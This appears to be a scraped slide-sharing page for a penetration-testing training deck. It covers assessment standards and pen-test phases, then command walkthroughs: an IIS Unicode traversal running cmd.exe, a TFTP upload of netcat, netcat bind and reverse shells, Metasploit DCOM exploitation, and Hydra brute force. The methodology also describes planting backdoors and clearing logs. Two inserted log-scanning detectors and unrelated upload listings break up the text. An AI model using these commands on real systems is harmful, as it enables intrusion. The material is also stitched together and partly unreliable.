Program:
Certified Computer Security Analyst (CCSA)

LSP Telematika
Created By Semi Yulianto
Shared By Linuxer@kaskus.co.id
Semi Yulianto
MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA,
CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc.

Current Roles:
Independent Trainer and Consultant
EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)
ITS2 (Riyadh, Saudi Arabia)
Senior Technical Trainer/Security Consultant
IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)
Security Consultant (Web Application Pen-Tester)
Security Consultant (ESET Anti-Virus & Smart Security)

Contacts:
semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com
+62 852 1325 6600 and +60 14 9377 462
1.   Vulnerabilities by Management Categories
2.   Assessment Standards
3.   Assessment Service Definition
4.   Network Assessment Methodology
5.   Pen-Test Methodology
6.   Security Tools
7.   Investigating Vulnerabilities
OS configuration - Vulnerabilities due to improperly configured operating system software.
Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.
Password/access control - Failure to comply with password policy and improper access control settings.
Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.
Dangerous services - Existence of vulnerable or easily exploited services or processes.
Application configuration - Vulnerabilities due to improperly configured applications.

NSA (US)
The United States National Security Agency (NSA) has provided an INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard.
http://www.iatrp.com

CESG CHECK (UK)
The Government Communications Headquarters (GCHQ) in the United Kingdom has an information assurance arm known as the Communications and Electronics Security Group (CESG). In the same way that the NSA IAM framework allows security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security testing teams within the U.K. to undertake government assessment work.
http://www.cesg.gov.uk/site/check/index.cfm

The IAM framework defines three levels of assessment:
Assessment - Level 1 involves discovering a cooperative high-level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands-on network or system testing is undertaken at this level.
Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.
Red Team - Level 3 is non-cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is non-intrusive, so within this framework, a Level 3 assessment involves full qualification of vulnerabilities.

CESG CHECK network security assessment competencies:
1. Use of DNS information retrieval tools for both single and multiple records, including an understanding of DNS record structure relating to target hosts.
2. Use of ICMP, TCP, and UDP network mapping and probing tools.
3. Demonstration of TCP service banner grabbing.
4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes.
5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.

CESG CHECK Unix-specific competencies:
1. User enumeration via finger, rusers, rwho, and SMTP techniques.
2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services.
3. Demonstration of testing for Network File System (NFS) weaknesses.
4. Testing for weaknesses within r-services (rsh, rexec, and rlogin).
5. Detection of insecure X Windows servers.
6. Testing for weaknesses within web, FTP, and Samba services.

CESG CHECK Windows NT-specific competencies:
1. Assessment of NetBIOS and CIFS services to enumerate users, groups, shares, domains, domain controllers, password policies, and associated weaknesses.
2. Username and password grinding via NetBIOS and CIFS services.
3. Detecting and demonstrating presence of known security weaknesses within Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.

Other Assessment Standards & Associations:
ISECOM’s Open Source Security Testing Methodology Manual (OSSTMM) - http://www.osstmm.org
Council of Registered Ethical Security Testers (CREST) - http://www.crestapproved.com
TIGER Scheme - http://www.tigerscheme.org
EC-Council’s Certified Ethical Hacker (CEH) - http://www.eccouncil.org/CEH.htm
Open Web Application Security Project (OWASP) - http://www.owasp.org

1.   Vulnerability Scanning
2.   Network Security Assessment
3.   Web Application Testing
4.   Penetration Testing
5.   Onsite Audit
Vulnerability Scanning
Uses automated systems (such as Nessus, ISS Internet Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security.

Network Security Assessment
An effective blend of automated and hands-on manual vulnerability testing and qualification. The report is usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.

Web Application Testing
Involves post-authentication assessment of web application components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated.

Penetration Testing
Involves multiple attack vectors (e.g., telephone war dialing, social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.

Onsite Audit
Provides the clearest picture of network security. Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.

High-level components of Network Assessment:
1. Network reconnaissance to identify IP networks and hosts of interest.
2. Bulk network scanning and probing to identify potentially vulnerable hosts.
3. Investigation of vulnerabilities and further network probing by hand.
4. Exploitation of vulnerabilities and circumvention of security mechanisms.

1.   Information Gathering
2.   Service Enumeration
3.   Vulnerability Identification
4.   Penetration
5.   Maintaining Access
6.   Housekeeping
Information Gathering
The objective of information gathering is to find as much information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering.

Service Enumeration
Involves launching network and port scanning to find open and filtered ports and the services running on a specific port.

Vulnerability Identification
Involves finding new and currently available vulnerabilities in the operating systems, applications and/or services (manually or automated).

Penetration
Involves active penetration of a specific target of evaluation by exploiting any new or known vulnerability.

Maintaining Access
Involves uploading a trojan or backdoor with the objective of making it easier to go in and out of the target of evaluation without having to repeat the exploitation, and ensuring that the activities are not noticed.

Housekeeping
Cleaning up to cover tracks. Involves disabling audit settings and clearing or altering log files (system, security and application).

Scanning Tools:
1. Nmap (http://www.insecure.org)
2. Nessus (http://www.nessus.org)
3. ISS Internet Scanner (http://www.iss.net)
4. eEye Retina (http://www.eeye.com)
5. QualysGuard (http://www.qualys.com)
6. Matta Colossus (http://www.trustmatta.com)

Exploitation Frameworks:
1. Metasploit Framework (http://www.metasploit.com)
2. Core IMPACT (http://www.coresecurity.com)
3. Immunity CANVAS (http://www.immunityinc.com/products-canvas.shtml)

Proxy-based web application testing tools:
1. Paros (http://www.parosproxy.org)
2. WebScarab (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
3. Burp Suite (http://portswigger.net)

Active web application crawling and fuzzing tools:
1. Wapiti (http://wapiti.sourceforge.net)
2. Nikto (http://www.cirt.net/code/nikto.shtml)

Web Application Scanning Tools:
1. Acunetix Web Vulnerability Scanner (http://www.acunetix.com)
2. Watchfire AppScan (http://www.watchfire.com/products/appscan/)
3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspect/)
4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic_hailstorm.php)

Useful Websites:
1. Securiteam (http://www.securiteam.com)
2. SecurityFocus (http://www.securityfocus.com)
3. milw0rm (http://www.milw0rm.com)
4. Offensive Security Exploit DB (http://www.exploit-db.com)
5. Packet Storm (http://www.packetstormsecurity.org)
6. FrSIRT (http://www.frsirt.com)
7. MITRE Corporation CVE (http://cve.mitre.org)
8. NIST National Vulnerability Database (http://nvd.nist.gov)
9. ISS X-Force (http://xforce.iss.net)
10. CERT vulnerability notes (http://www.kb.cert.org/vuls)
11. eEye Preview (http://research.eeye.com/html/services)
12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com)
13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)

1.    Information Gathering
2.    Service Identification
3.    Vulnerability Identification
4.    Penetration (Exploitation)
5.    Maintaining Access
6.    Housekeeping (Covering Tracks)
7.    Password Cracking
8.    Client-Side Hacking
9.    Web Application Hacking
10.   Denial-of-Service (DoS) Attacks
11.   Sniffing and ARP Spoofing
12.   Wireless Hacking
13.   Linux Hacking
14.   Analyzing Attack Signatures with IDS and Sniffer
15.   Evading IDS and Firewall
IIS Unicode Directory Traversal Exploit
 Syntax:
  nc -v <target_ip> <http_port>
  GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>

 Example:
  nc -v 131.107.1.101 80
  GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir

TFTP (Trivial File Transfer Protocol)

Upload and Download
 Syntax:
  tftp -i <localhost_ip> GET <file>
  tftp -i <localhost_ip> PUT <file>

 Example:
  tftp -i 131.107.1.252 GET nc.exe
  tftp -i 131.107.1.101 PUT nc.exe

 Unicode Example:
  GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe

Netcat (Network Swiss Army Knife)

Server Mode (listening/reverse TCP)
 Syntax:
  nc -v -l -p <port_to_listen_to>
  nc -vlp <port_to_listen_to>

 Example:
  nc -v -l -p 555
  nc -vlp 555

Netcat (Network Swiss Army Knife)

Client Mode (connecting/bind TCP)
 Syntax:
  nc -v <target_ip> <target_port>

 Example:
  nc -v 131.107.1.101 555

Netcat (Network Swiss Army Knife)

Server Mode (listening/reverse TCP)
 Syntax:
  nc -v -l -p <listening_port>

 Unicode Syntax:
  GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>

 Example:
  GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555

Netcat (Network Swiss Army Knife)

Client Mode (connecting/bind TCP)
 Syntax:
  nc -v <target_ip> <target_port>

 Unicode Syntax:
  GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>

 Example:
  GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+131.107.1.252+555

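The cmd.exe, tftp and netcat requests above all ride on the same double-encoded `..%255c..` traversal, and a server or log reviewer only catches it if the path is fully decoded before the traversal check. The detector below is an added example, not part of the original deck: it fully decodes and canonicalizes request paths from constructed, simplified log lines (assumed format `client method uri status`, not real IIS W3C output) and flags double-encoding, escape from the web root, and a cmd.exe target.

```python
"""Detect IIS Unicode / double-encoded directory traversal requests in web logs.

Added example. The log format is a constructed, simplified
"client method uri status" line, not real IIS W3C output.
"""
import re
from urllib.parse import unquote

# Constructed sample lines: two match the deck's cmd.exe/tftp requests, one is
# the single-encoded variant, the rest are benign (one has a harmless "..").
SAMPLE_LOG = """\
131.107.1.252 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 200
131.107.1.252 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe 200
10.0.0.7 GET /index.html 200
10.0.0.9 GET /docs/a/../b.html 200
10.0.0.11 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir 404
"""

LOG_LINE = re.compile(r"^(?P<client>\S+) (?P<method>\S+) (?P<uri>\S+) (?P<status>\d{3})$")
MAX_DECODE_ROUNDS = 4  # bound the loop; anything needing more rounds is flagged anyway


def canonicalize(path: str) -> tuple[int, str]:
    """Percent-decode until the string stops changing (bounded), then fold
    backslashes to slashes. Returns (rounds_that_changed_something, canonical_path).
    A server is only safe if it does all of this BEFORE checking the path."""
    rounds = 0
    current = path
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return rounds, current.replace("\\", "/")


def escapes_webroot(canonical_path: str) -> bool:
    """Walk the segments; True as soon as '..' would step above the web root."""
    depth = 0
    for segment in canonical_path.split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment and segment != ".":
            depth += 1
    return False


def analyze_request(uri: str) -> dict:
    """Classify one request URI; 'reasons' is empty for benign requests."""
    path, _, query = uri.partition("?")
    rounds, canonical = canonicalize(path)
    reasons = []
    if rounds > 1:
        reasons.append("double-encoded")  # browsers never produce this on their own
    if escapes_webroot(canonical):
        reasons.append("traversal")
    if canonical.lower().endswith("/cmd.exe"):
        reasons.append("cmd.exe")
    return {"uri": uri, "canonical": canonical, "reasons": reasons}


def scan_log(text: str) -> list[dict]:
    """Return one finding per suspicious line, keeping the client address."""
    findings = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue  # skip malformed lines rather than crash on them
        result = analyze_request(match["uri"])
        if result["reasons"]:
            result["client"] = match["client"]
            result["status"] = int(match["status"])
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["status"],
              ",".join(finding["reasons"]), finding["canonical"])
```

The 404 on the single-encoded line is what a patched server returns; the request is still worth alerting on because it shows who is probing.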
Nmap (Ping Sweep/Network Scan)
 Syntax:
  nmap -sP <network_id>

 Example:
  nmap -sP 131.107.1.0/24

Nmap (Port Scan)
 Syntax:
  nmap <target_ip>

 Example:
  nmap 131.107.1.101

Nmap (Port Scan with Options)
 Syntax:
  nmap <option> <target_ip>

 Examples:
  nmap -sS -sV -O 131.107.1.101
  nmap -sS -sV -p80,443 -O 131.107.1.101
  nmap -sS -sV -p80,443 -O -T4 131.107.1.101
  nmap -sS -sV -p80,443 -O -T4 -PN 131.107.1.101
  nmap -sU -sV -O 131.107.1.101
  nmap -A 131.107.1.101

Nmap (Enumeration)
 Syntax:
  nmap <option> --script=<script> <target_ip>

 Examples:
  nmap -sS --script=smb-enum-users 131.107.1.101
  nmap -sS --script=smb-enum-shares 131.107.1.101
  nmap -sS --script=smb-enum-domains 131.107.1.101
  nmap -sS --script=smb-enum-processes 131.107.1.101
  nmap -sS --script=smb-enum-security 131.107.1.101

Metasploit Framework Exploit Module (MSFConsole)
  cd /pentest/exploits/msf3
  ./msfconsole

 Syntax:
  msf > help
  msf > show exploits
  msf > use <exploit_module>
  msf > show payloads
  msf > set PAYLOAD <payload_type>
  msf > show options
  msf > set RHOST <target_ip>
  msf > set LHOST <localhost_ip>
  msf > set LPORT <local_port>
  msf > set RPORT <remote_port>
  msf > show targets
  msf > set TARGET <target_id>
  msf > exploit

Metasploit Framework Exploit Module (MSFConsole)
  cd /pentest/exploits/msf3
  ./msfconsole

 Example:
  msf > help
  msf > show exploits
  msf > use windows/dcerpc/ms03_026_dcom
  msf > show payloads
  msf > set PAYLOAD windows/shell/reverse_tcp
  msf > show options
  msf > set RHOST 131.107.1.101
  msf > set LHOST 131.107.1.252
  msf > set LPORT 5555
  msf > set RPORT 1234
  msf > show targets
  msf > set TARGET 0
  msf > exploit

Metasploit Framework Auxiliary Module
  cd /pentest/exploits/msf3
  ./msfconsole

 Syntax:
  msf > help
  msf > show auxiliary
  msf > use <auxiliary_module>
  msf > set RHOSTS <target_ip_or_network_id>
  msf > run

Metasploit Framework Auxiliary Module
  cd /pentest/exploits/msf3
  ./msfconsole

 Example 1:
  msf > help
  msf > show auxiliary
  msf > use scanner/smb/smb_version
  msf > set RHOSTS 131.107.1.101
  msf > run

 Example 2:
  msf > help
  msf > show auxiliary
  msf > use scanner/smb/smb_version
  msf > set RHOSTS 131.107.1.0/24
  msf > run

Metasploit Framework Exploit Module (MSFCLI)
  cd /pentest/exploits/msf3

 Syntax:
  ./msfcli <exploit_module> <payload_type> <options> E

 Example:
  ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=131.107.1.101 E

THC Hydra (Dictionary-based Password Cracking)
  cd /tmp

 Syntax:
  ./hydra -L <users_file> -P <passwords_file> <target_ip> <service_type>

 Examples:
  ./hydra -L login.txt -P pass.txt 131.107.1.101 ftp
  ./hydra -L login.txt -P pass.txt 131.107.1.101 smb
  ./hydra -L login.txt -P pass.txt 131.107.1.101 mssql
  ./hydra -L login.txt -P pass.txt 131.107.1.101 rpc
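From the defender's side, a run like the ones above (`-L` user list, `-P` password list) appears as a burst of failures across many different usernames from one source, often followed by a single success. The detector below is an added example, not from the deck: a sliding-window check over constructed authentication events (assumed format `timestamp service client user outcome`, not any real daemon's log) that reports the failure count, the distinct usernames tried, and whether a success followed the burst.

```python
"""Flag dictionary-style logon attacks (many failures, many usernames, one source).

Added example. The event format "timestamp service client user outcome" is
constructed for this demo, not the output of any real FTP/SMB/MSSQL daemon.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # burst window
FAIL_THRESHOLD = 5              # failures inside one window that trigger an alert

# Constructed sample: one source cycling through a user list against FTP and
# ending in a success, plus one ordinary user who mistyped twice.
SAMPLE_AUTH_LOG = """\
2024-05-01T10:00:00 ftp 131.107.1.252 admin FAIL
2024-05-01T10:00:01 ftp 131.107.1.252 admin FAIL
2024-05-01T10:00:01 ftp 131.107.1.252 root FAIL
2024-05-01T10:00:02 ftp 131.107.1.252 guest FAIL
2024-05-01T10:00:02 ftp 131.107.1.252 test FAIL
2024-05-01T10:00:03 ftp 131.107.1.252 oracle FAIL
2024-05-01T10:00:03 ftp 131.107.1.252 backup FAIL
2024-05-01T10:00:04 ftp 131.107.1.252 admin OK
2024-05-01T10:05:00 ftp 10.0.0.5 alice FAIL
2024-05-01T10:05:30 ftp 10.0.0.5 alice FAIL
2024-05-01T10:06:00 ftp 10.0.0.5 alice OK
"""


def parse_auth_log(text: str) -> list[tuple]:
    """Turn the constructed lines into (time, service, client, user, outcome) tuples."""
    events = []
    for line in text.splitlines():
        stamp, service, client, user, outcome = line.split()
        events.append((datetime.fromisoformat(stamp), service, client, user, outcome))
    return events


def detect_dictionary_attacks(events: list[tuple]) -> list[dict]:
    """One alert per (service, client) whose failures reach FAIL_THRESHOLD within WINDOW."""
    by_source = defaultdict(list)
    for event in events:
        by_source[(event[1], event[2])].append(event)

    alerts = []
    for (service, client), source_events in by_source.items():
        source_events.sort(key=lambda e: e[0])
        fails = [e for e in source_events if e[4] == "FAIL"]
        start = 0
        for end in range(len(fails)):
            # slide the window so that fails[start:end+1] all fall within WINDOW
            while fails[end][0] - fails[start][0] > WINDOW:
                start += 1
            if end - start + 1 >= FAIL_THRESHOLD:
                burst_end = fails[end][0]
                alerts.append({
                    "service": service,
                    "client": client,
                    "failures": len(fails),
                    # many distinct users from one source is the -L signature;
                    # a single user failing repeatedly is usually just a typo
                    "distinct_users": len({e[3] for e in fails}),
                    # a success right after the burst means the list held a
                    # valid credential: escalate, do not just block
                    "success_after_burst": any(
                        e[4] == "OK" and e[0] >= burst_end for e in source_events),
                })
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_dictionary_attacks(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```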
Nikto (Web Application Vulnerability Scanner)
  cd /pentest/nikto

 Syntax:
  ./nikto.pl -host <target_ip>

 Example:
  ./nikto.pl -host 131.107.1.101

MS4 level   being good citizen -imperative- (1) (1).pdfMS4 level   being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdfMr Bounab Samir
 
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...Nguyen Thanh Tu Collection
 
Employablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptxEmployablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptxryandux83rd
 
DiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdfDiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdfChristalin Nelson
 
The Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressThe Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressMaria Paula Aroca
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroomSamsung Business USA
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptxmary850239
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Celine George
 
18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptxUmeshTimilsina1
 
How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17Celine George
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptxmary850239
 
DBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdfDBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdfChristalin Nelson
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxAnupam32727
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationdeepaannamalai16
 
How to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command LineHow to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command LineCeline George
 

Recently uploaded (20)

31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
 
MS4 level being good citizen -imperative- (1) (1).pdf
MS4 level   being good citizen -imperative- (1) (1).pdfMS4 level   being good citizen -imperative- (1) (1).pdf
MS4 level being good citizen -imperative- (1) (1).pdf
 
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
BÀI TẬP BỔ TRỢ 4 KĨ NĂNG TIẾNG ANH LỚP 8 - CẢ NĂM - GLOBAL SUCCESS - NĂM HỌC ...
 
Employablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptxEmployablity presentation and Future Career Plan.pptx
Employablity presentation and Future Career Plan.pptx
 
DiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdfDiskStorage_BasicFileStructuresandHashing.pdf
DiskStorage_BasicFileStructuresandHashing.pdf
 
The Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian CongressThe Emergence of Legislative Behavior in the Colombian Congress
The Emergence of Legislative Behavior in the Colombian Congress
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17
 
Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,
 
18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx
 
How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17
 
CARNAVAL COM MAGIA E EUFORIA _
CARNAVAL COM MAGIA E EUFORIA            _CARNAVAL COM MAGIA E EUFORIA            _
CARNAVAL COM MAGIA E EUFORIA _
 
Chi-Square Test Non Parametric Test Categorical Variable
Chi-Square Test Non Parametric Test Categorical VariableChi-Square Test Non Parametric Test Categorical Variable
Chi-Square Test Non Parametric Test Categorical Variable
 
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx
 
DBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdfDBMSArchitecture_QueryProcessingandOptimization.pdf
DBMSArchitecture_QueryProcessingandOptimization.pdf
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentation
 
How to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command LineHow to Uninstall a Module in Odoo 17 Using Command Line
How to Uninstall a Module in Odoo 17 Using Command Line
 

NSA and PT

  • 3. 1. Vulnerabilities by Management Categories 2. Assessment Standards 3. Assessment Service Definition 4. Network Assessment Methodology 5. Pen-Test Methodology 6. Security Tools 7. Investigating Vulnerabilities
  • 4. OS configuration - Vulnerabilities due to improperly configured operating system software.
    Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.
    Password/access control - Failure to comply with password policy and improper access control settings.
    Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.
    Dangerous services - Existence of vulnerable or easily exploited services or processes.
    Application configuration - Vulnerabilities due to improperly configured applications.
  • 7. NSA (US) - The United States National Security Agency (NSA) has provided an INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com
    CESG CHECK (UK) - The Government Communications Headquarters (GCHQ) in the United Kingdom has an information assurance arm known as the Communications and Electronics Security Group (CESG). In the same way that the NSA IAM framework allows security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
  • 8. The IAM framework defines three levels of assessment:
    Assessment - Level 1 involves discovering a cooperative high-level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands-on network or system testing is undertaken at this level.
    Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.
    Red Team - Level 3 is noncooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is nonintrusive, so within this framework a Level 3 assessment involves full qualification of vulnerabilities.
  • 9. The CESG CHECK network security assessment competencies:
    1. Use of DNS information retrieval tools for both single and multiple records, including an understanding of DNS record structure relating to target hosts.
    2. Use of ICMP, TCP, and UDP network mapping and probing tools.
    3. Demonstration of TCP service banner grabbing.
    4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes.
    5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
  • 10. CESG CHECK Unix-specific competencies:
    1. User enumeration via finger, rusers, rwho, and SMTP techniques.
    2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services.
    3. Demonstration of testing for Network File System (NFS) weaknesses.
    4. Testing for weaknesses within r-services (rsh, rexec, and rlogin).
    5. Detection of insecure X Windows servers.
    6. Testing for weaknesses within web, FTP, and Samba services.
  • 11. CESG CHECK Windows NT-specific competencies:
    1. Assessment of NetBIOS and CIFS services to enumerate users, groups, shares, domains, domain controllers, password policies, and associated weaknesses.
    2. Username and password grinding via NetBIOS and CIFS services.
    3. Detecting and demonstrating the presence of known security weaknesses within Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
  • 12. Other Assessment Standards & Associations:
    ISECOM's Open Source Security Testing Methodology Manual (OSSTMM) http://www.osstmm.org
